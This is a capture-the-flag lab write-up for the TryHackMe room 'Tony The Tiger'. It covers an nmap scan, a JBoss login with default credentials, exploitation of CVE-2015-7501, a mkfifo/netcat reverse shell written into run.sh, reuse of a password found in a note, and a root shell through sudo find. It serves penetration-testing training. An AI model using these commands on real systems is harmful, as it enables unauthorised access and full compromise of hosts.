# CTF TryHackMe - Tony The Tiger

## Nmap

```bash
# Nmap 7.92 scan initiated Mon Jan 10 18:06:31 2022 as: nmap -sC -sV -oN nmap.log 10.10.35.190
Nmap scan report for 10.10.35.190
Host is up (0.051s latency).
Not shown: 989 closed tcp ports (conn-refused)
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 d6:97:8c:b9:74:d0:f3:9e:fe:f3:a5:ea:f8:a9:b5:7a (DSA)
|   2048 33:a4:7b:91:38:58:50:30:89:2d:e4:57:bb:07:bb:2f (RSA)
|   256 21:01:8b:37:f5:1e:2b:c5:57:f1:b0:42:b7:32:ab:ea (ECDSA)
|_  256 f6:36:07:3c:3b:3d:71:30:c4:cd:2a:13:00:b5:25:ae (ED25519)
80/tcp   open  http        Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-generator: Hugo 0.66.0
|_http-title: Tony&#39;s Blog
1090/tcp open  java-rmi    Java RMI
|_rmi-dumpregistry: ERROR: Script execution failed (use -d to debug)
1091/tcp open  java-rmi    Java RMI
1098/tcp open  java-rmi    Java RMI
1099/tcp open  java-object Java Object Serialization
| fingerprint-strings: 
|   NULL: 
|     java.rmi.MarshalledObject|
|     hash[
|     locBytest
|     objBytesq
|     #http://thm-java-deserial.home:8083/q
|     org.jnp.server.NamingServer_Stub
|     java.rmi.server.RemoteStub
|     java.rmi.server.RemoteObject
|     xpwA
|     UnicastRef2
|_    thm-java-deserial.home
4446/tcp open  java-object Java Object Serialization
5500/tcp open  hotline?
| fingerprint-strings: 
|   DNSStatusRequestTCP, RPCCheck, TerminalServerCookie: 
|     NTLM
|     GSSAPI
|     DIGEST-MD5
|     CRAM-MD5
|     thm-java-deserial
|   DNSVersionBindReqTCP: 
|     NTLM
|     CRAM-MD5
|     DIGEST-MD5
|     GSSAPI
|     thm-java-deserial
|   GenericLines, NULL, TLSSessionReq: 
|     NTLM
|     GSSAPI
|     CRAM-MD5
|     DIGEST-MD5
|     thm-java-deserial
|   GetRequest: 
|     NTLM
|     CRAM-MD5
|     GSSAPI
|     DIGEST-MD5
|     thm-java-deserial
|   HTTPOptions, RTSPRequest: 
|     GSSAPI
|     DIGEST-MD5
|     NTLM
|     CRAM-MD5
|     thm-java-deserial
|   Help: 
|     DIGEST-MD5
|     CRAM-MD5
|     GSSAPI
|     NTLM
|     thm-java-deserial
|   Kerberos: 
|     CRAM-MD5
|     NTLM
|     DIGEST-MD5
|     GSSAPI
|     thm-java-deserial
|   SSLSessionReq: 
|     CRAM-MD5
|     NTLM
|     GSSAPI
|     DIGEST-MD5
|_    thm-java-deserial
8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)
| ajp-methods: 
|   Supported methods: GET HEAD POST PUT DELETE TRACE OPTIONS
|   Potentially risky methods: PUT DELETE TRACE
|_  See https://nmap.org/nsedoc/scripts/ajp-methods.html
8080/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1
|_http-server-header: Apache-Coyote/1.1
|_http-title: Welcome to JBoss AS
| http-methods: 
|_  Potentially risky methods: PUT DELETE TRACE
|_http-open-proxy: Proxy might be redirecting requests
8083/tcp open  http        JBoss service httpd
|_http-title: Site doesn't have a title (text/html).
3 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port1099-TCP:V=7.92%I=7%D=1/10%Time=61DC67B0%P=x86_64-pc-linux-gnu%r(NU
SF:LL,17B,"\xac\xed\0\x05sr\0\x19java\.rmi\.MarshalledObject\|\xbd\x1e\x97
SF:\xedc\xfc>\x02\0\x03I\0\x04hash\[\0\x08locBytest\0\x02\[B\[\0\x08objByt
SF:esq\0~\0\x01xp\^\x08\x17:ur\0\x02\[B\xac\xf3\x17\xf8\x06\x08T\xe0\x02\0
SF:\0xp\0\0\x004\xac\xed\0\x05t\0#http://thm-java-deserial\.home:8083/q\0~
SF:\0\0q\0~\0\0uq\0~\0\x03\0\0\0\xcd\xac\xed\0\x05sr\0\x20org\.jnp\.server
SF:\.NamingServer_Stub\0\0\0\0\0\0\0\x02\x02\0\0xr\0\x1ajava\.rmi\.server\
SF:.RemoteStub\xe9\xfe\xdc\xc9\x8b\xe1e\x1a\x02\0\0xr\0\x1cjava\.rmi\.serv
SF:er\.RemoteObject\xd3a\xb4\x91\x0ca3\x1e\x03\0\0xpwA\0\x0bUnicastRef2\0\
SF:0\x16thm-java-deserial\.home\0\0\x04JE\xcd\xdc~\x0e\?\xfd\x8f\xa8\xf4\x
SF:8cv\0\0\x01~D\xf2\xfb\xc9\x80\x02\0x");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port4446-TCP:V=7.92%I=7%D=1/10%Time=61DC67B6%P=x86_64-pc-linux-gnu%r(NU
SF:LL,4,"\xac\xed\0\x05");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port5500-TCP:V=7.92%I=7%D=1/10%Time=61DC67B6%P=x86_64-pc-linux-gnu%r(NU
SF:LL,4B,"\0\0\0G\0\0\x01\0\x03\x04\0\0\0\x03\x03\x04\0\0\0\x02\x01\x04NTL
SF:M\x01\x06GSSAPI\x01\x08CRAM-MD5\x01\nDIGEST-MD5\x02\x11thm-java-deseria
SF:l")%r(GenericLines,4B,"\0\0\0G\0\0\x01\0\x03\x04\0\0\0\x03\x03\x04\0\0\
SF:0\x02\x01\x04NTLM\x01\x06GSSAPI\x01\x08CRAM-MD5\x01\nDIGEST-MD5\x02\x11
SF:thm-java-deserial")%r(GetRequest,4B,"\0\0\0G\0\0\x01\0\x03\x04\0\0\0\x0
SF:3\x03\x04\0\0\0\x02\x01\x04NTLM\x01\x08CRAM-MD5\x01\x06GSSAPI\x01\nDIGE
SF:ST-MD5\x02\x11thm-java-deserial")%r(HTTPOptions,4B,"\0\0\0G\0\0\x01\0\x
SF:03\x04\0\0\0\x03\x03\x04\0\0\0\x02\x01\x06GSSAPI\x01\nDIGEST-MD5\x01\x0
SF:4NTLM\x01\x08CRAM-MD5\x02\x11thm-java-deserial")%r(RTSPRequest,4B,"\0\0
SF:\0G\0\0\x01\0\x03\x04\0\0\0\x03\x03\x04\0\0\0\x02\x01\x06GSSAPI\x01\nDI
SF:GEST-MD5\x01\x04NTLM\x01\x08CRAM-MD5\x02\x11thm-java-deserial")%r(RPCCh
SF:eck,4B,"\0\0\0G\0\0\x01\0\x03\x04\0\0\0\x03\x03\x04\0\0\0\x02\x01\x04NT
SF:LM\x01\x06GSSAPI\x01\nDIGEST-MD5\x01\x08CRAM-MD5\x02\x11thm-java-deseri
SF:al")%r(DNSVersionBindReqTCP,4B,"\0\0\0G\0\0\x01\0\x03\x04\0\0\0\x03\x03
SF:\x04\0\0\0\x02\x01\x04NTLM\x01\x08CRAM-MD5\x01\nDIGEST-MD5\x01\x06GSSAP
SF:I\x02\x11thm-java-deserial")%r(DNSStatusRequestTCP,4B,"\0\0\0G\0\0\x01\
SF:0\x03\x04\0\0\0\x03\x03\x04\0\0\0\x02\x01\x04NTLM\x01\x06GSSAPI\x01\nDI
SF:GEST-MD5\x01\x08CRAM-MD5\x02\x11thm-java-deserial")%r(Help,4B,"\0\0\0G\
SF:0\0\x01\0\x03\x04\0\0\0\x03\x03\x04\0\0\0\x02\x01\nDIGEST-MD5\x01\x08CR
SF:AM-MD5\x01\x06GSSAPI\x01\x04NTLM\x02\x11thm-java-deserial")%r(SSLSessio
SF:nReq,4B,"\0\0\0G\0\0\x01\0\x03\x04\0\0\0\x03\x03\x04\0\0\0\x02\x01\x08C
SF:RAM-MD5\x01\x04NTLM\x01\x06GSSAPI\x01\nDIGEST-MD5\x02\x11thm-java-deser
SF:ial")%r(TerminalServerCookie,4B,"\0\0\0G\0\0\x01\0\x03\x04\0\0\0\x03\x0
SF:3\x04\0\0\0\x02\x01\x04NTLM\x01\x06GSSAPI\x01\nDIGEST-MD5\x01\x08CRAM-M
SF:D5\x02\x11thm-java-deserial")%r(TLSSessionReq,4B,"\0\0\0G\0\0\x01\0\x03
SF:\x04\0\0\0\x03\x03\x04\0\0\0\x02\x01\x04NTLM\x01\x06GSSAPI\x01\x08CRAM-
SF:MD5\x01\nDIGEST-MD5\x02\x11thm-java-deserial")%r(Kerberos,4B,"\0\0\0G\0
SF:\0\x01\0\x03\x04\0\0\0\x03\x03\x04\0\0\0\x02\x01\x08CRAM-MD5\x01\x04NTL
SF:M\x01\nDIGEST-MD5\x01\x06GSSAPI\x02\x11thm-java-deserial");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Jan 10 18:07:16 2022 -- 1 IP address (1 host up) scanned in 44.20 seconds
```

This is a big result of nmap scan, but this is an overview :

```
SSH => 22
Apache => 80
Apache Jserv => 8009
Apache Tomcat => 8080
JBoss => 8083
Java-rmi => 1091 1098
Java Object Serialization => 1099 4446
hotline ? => 5500
```

If we go on 10.10.35.190:8080 we can see JBoss. And if we go to the admin console, login with default cred (*admin:admin*) it's works !
This room is vulnerable to the CVE-2015-7501 let's exploit this.


## Exploit CVE-2015-7501

Just following this repo : https://github.com/joaomatosf/jexboss

And get a shell

```bash
Shell> id
 Failed to check for updates
uid=1000(cmnatic) gid=1000(cmnatic) groups=1000(cmnatic),4(adm),24(cdrom),30(dip),46(plugdev),110(lpadmin),111(sambashare)
```

## Go to reverse shell

It seem is not fully shell... i can cd command and so on...

If i check the bash_history of user cmnatic, i can see he edited /home/cmnatic/jboss/bin/run.sh and executed this one.
so let's do a reverse shell

```bash
Shell> echo -e "#!/bin/bash\nrm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.9.188.66 9001 >/tmp/f" > /home/cmnatic/jboss/bin/run.sh
```

Start nc listener on local machine 

```bash
nc -lvnp 9001
```

And launch the run.sh script

```bash
Shell> bash /home/cmnatic/jboss/bin/run.sh
```

And yeah, we got a reverse shell, and we can navigate 

```bash
nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.9.188.66] from (UNKNOWN) [10.10.35.190] 51736
sh: 0: can't access tty; job control turned off
$ pwd
/
$ cd /home
$ pwd
/home
```

## Pivoting to jboss user

In /home/jboss we have a file named note which contain

```bash
$ cat note
Hey JBoss!

Following your email, I have tried to replicate the issues you were having with the system.

However, I don't know what commands you executed - is there any file where this history is stored that I can access?

Oh! I almost forgot... I have reset your password as requested (make sure not to tell it to anyone!)

Password: likeaboss

Kind Regards,
CMNatic
```

It seems we get a password of jboss

```
likeaboss
```

Try ssh connection with jboss user and password discovered

```bash
ssh jboss@10.10.35.190
[..SNIP..]
jboss@10.10.35.190's password: 
[..SNIP..]
jboss@thm-java-deserial:~$ 
```

Oh yeah, we are in !!


## PrivEsc to Root

```bash
jboss@thm-java-deserial:~$ sudo -l
Matching Defaults entries for jboss on thm-java-deserial:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User jboss may run the following commands on thm-java-deserial:
    (ALL) NOPASSWD: /usr/bin/find
```

Exploit the find command to get a root shell (https://gtfobins.github.io/gtfobins/find/#sudo)

```bash
jboss@thm-java-deserial:~$ sudo find . -exec /bin/sh \; -quit
# id
uid=0(root) gid=0(root) groups=0(root)
```

And we are root !! :D
